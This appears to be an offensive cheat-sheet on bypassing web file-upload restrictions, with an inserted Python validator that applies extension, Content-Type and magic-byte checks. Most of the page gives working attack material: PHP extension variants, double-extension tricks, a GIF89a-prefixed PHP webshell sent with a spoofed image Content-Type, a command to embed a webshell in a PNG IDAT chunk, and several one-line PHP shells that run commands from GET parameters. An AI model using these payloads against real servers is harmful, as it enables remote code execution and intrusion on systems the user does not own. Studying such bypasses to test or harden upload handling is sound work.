# File Upload Tricks

When uploading files, check whether the server validates:

1. **File extension**

   * Which extensions does the server allow server-side? Try:

   ```
   php
   phtml
   php4
   ```

   * Stacked / double extensions, e.g.:

   ```
   .php.png
   .%20.php
   ```

Using a GIF header (shell.php):

```
GIF89a;
<?php
system($_GET['cmd']);
?>
```

Advanced GIF (as a multipart form part):

```http
Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>
```

2. **Content-Type header**

* Does a server-side extension such as `.php` get past the upload restriction?
  * If yes, just change the Content-Type header to an image type (e.g. `image/png`) and the file will still run as PHP.
* Does the server validate the Content-Type header, e.g. by disallowing `application/json`?

3. **Magic bytes (file hex value)**

* Does the server check the **file signature**?
* If not, the file signature can be changed with `hexedit`.
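A server-side validator that applies the three checks above (extension allowlist with every dot-separated component inspected, Content-Type used only as confirmation, magic bytes, plus a script-marker scan for the `GIF89a;` trick), as an added Python example that is not part of the original page; the allowlist, extension list and sample inputs are constructed for illustration.

```python
import os
import urllib.parse

# Constructed allowlist for this example: extension -> (expected Content-Type, magic bytes)
ALLOWED = {
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif":  ("image/gif",  b"GIF8"),          # covers GIF87a and GIF89a
}
# Extensions that must never appear anywhere in the name (rejects shell.php.png and web.png.php)
EXECUTABLE = {"php", "phtml", "php3", "php4", "php5", "php7", "phar"}
# Script markers a genuine image body has no reason to contain
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename: str, content_type: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Applies the three checks from the list above in order."""
    # 1. File extension: decode %20 tricks, drop any path, inspect every dot-separated part
    name = urllib.parse.unquote(os.path.basename(filename)).strip().lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing base name or extension"
    for part in parts[1:]:
        if part in EXECUTABLE:
            return False, f"executable extension component {part!r}"
        if not part.isalnum():          # catches ' ' from .%20.php and '' from 'a..png'
            return False, f"malformed extension component {part!r}"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not in allowlist"
    expected_type, magic = ALLOWED[ext]

    # 2. Content-Type: client-controlled, so it may only confirm the extension, never decide
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared != expected_type:
        return False, f"Content-Type {declared!r} does not match .{ext}"

    # 3. Magic bytes: the body must start with the signature that belongs to the extension
    if not data.startswith(magic):
        return False, f"file signature does not match .{ext}"

    # Defence in depth: 'GIF89a;<?php ...' passes check 3, so also refuse script markers.
    # Re-encoding the image server-side is the stronger control; this is only a cheap filter.
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker embedded in image body"
    return True, "ok"
```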

### PHP Function Exploit

Applies when the server processes the upload with `imagecopyresampled` / `imagecreatefromstring`.


Solution: hide the webshell in the IDAT chunk of the PNG, using the PNG-IDAT-Payload-Generator:

https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master

```bash
python3 generate.py -m php -o webshell.png
```

Rename to `webshell.png.php`

#### Shell exec

PHP functions that run a shell command: `shell_exec()`, `exec()`, `system()`

Examples:

```php
<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
```

```php
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
```

### Content-Types of Common Files

#### Pictures

```
image/png
image/jpeg
image/gif
```

#### JSON

```
application/json
```

#### PHP

```
application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream
```

#### TXT

```
text/plain
```

#### XML

```
application/xml
text/xml
```

#### HTML

```
text/html
```

#### JAVASCRIPT

```
text/javascript
application/javascript
```

#### PDF

```
application/pdf
```

#### AUDIO

```
audio/mpeg
audio/wav
```

#### VIDEO

```
video/mp4
video/quicktime
```
